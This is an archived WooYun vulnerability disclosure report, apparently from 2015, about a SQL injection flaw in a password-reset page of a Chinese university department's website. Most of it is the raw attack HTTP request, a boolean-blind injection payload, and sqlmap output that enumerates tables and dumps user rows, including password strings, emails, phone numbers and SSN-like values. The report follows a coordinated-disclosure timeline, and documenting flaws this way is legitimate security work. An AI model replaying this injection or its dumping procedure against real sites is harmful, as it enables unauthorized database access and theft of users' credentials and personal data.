乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-24: 细节已通知厂商并且等待厂商处理中 2015-11-28: 厂商已经确认,细节仅向厂商公开 2015-12-08: 细节向核心白帽子及相关领域专家公开 2015-12-18: 细节向普通白帽子公开 2015-12-28: 细节向实习白帽子公开 2016-01-12: 细节向公众公开
RT
http://msi.sicnu.edu.cn/ 四川师范大学数学与软件科学学院
POST /office/forgetpass.asp HTTP/1.1Content-Length: 81Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://msi.sicnu.edu.cnCookie: ASPSESSIONIDSCTBDDSD=LPMPLFEBCCOLFAKAMCHLAMJP; IPAddress=115%2E159%2E112%2E27Host: msi.sicnu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*one=one&Userid=-1
Userid参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: Userid (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: one=one&Userid=-5305' OR 7258=7258 AND 'aCml'='aCml---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[4 tables]+----------+| user || type || url || userinfo |
+----------+
[20:47:36] [WARNING] running in a single-thread mode. This could take a while[20:47:36] [INFO] retrieved: id[20:47:36] [INFO] retrieved: name[20:47:36] [INFO] retrieved: username[20:47:37] [INFO] retrieved: email[20:47:37] [INFO] retrieved: ip[20:47:37] [INFO] retrieved: state[20:47:37] [INFO] retrieved: pwd[20:47:38] [INFO] retrieved: phone[20:47:39] [INFO] retrieved: part[20:47:39] [INFO] retrieved: rule[20:47:40] [INFO] retrieved: mobile[20:47:41] [INFO] fetching entries for table 'user' in database 'Microsoft_Access_masterdb'[20:47:41] [INFO] fetching number of entries for table 'user' in database 'Microsoft_Access_masterdb'[20:47:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[20:47:41] [INFO] retrieved: 333[20:47:45] [INFO] fetching number of distinct values for column 'id'[20:47:45] [INFO] retrieved: 333[20:47:50] [INFO] using column 'id' as a pivot for retrieving row data[20:47:50] [INFO] retrieved: 100[20:47:57] [INFO] retrieved: 118.193.151.51[20:48:20] [INFO] retrieved: g00dPa$$w0rD[20:48:40] [INFO] retrieved: wowulcsw[20:48:55] [INFO] retrieved: [f[20:49:04] [INFO] retrieved:[20:49:05] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'[20:49:05] [INFO] retrieved: [email protected][20:49:31] [INFO] retrieved: 555-666-0[20:50:17] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)[20:50:38] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)606[20:50:44] [INFO] retrieved: 0[20:50:47] [INFO] retrieved: 987-65-4329[20:51:14] [INFO] retrieved: wowulcsw[20:51:27] [INFO] retrieved: 101[20:51:32] [INFO] retrieved: 118.193.151.51[20:51:58] [INFO] retrieved: g00dPa$$w0rD[20:52:27] [INFO] retrieved: yqxpwvsv[20:52:44] [INFO] retrieved: [f[20:52:56] [INFO] retrieved:[20:52:57] [INFO] retrieved: [email protected][20:53:25] [INFO] retrieved: 555-666-0606[20:53:47] [INFO] retrieved: 0[20:53:50] [INFO] retrieved: 987-65-4329[20:54:13] [INFO] retrieved: yqxpwvsv
危害等级:中
漏洞Rank:10
确认时间:2015-11-28 22:14
感谢支持!
暂无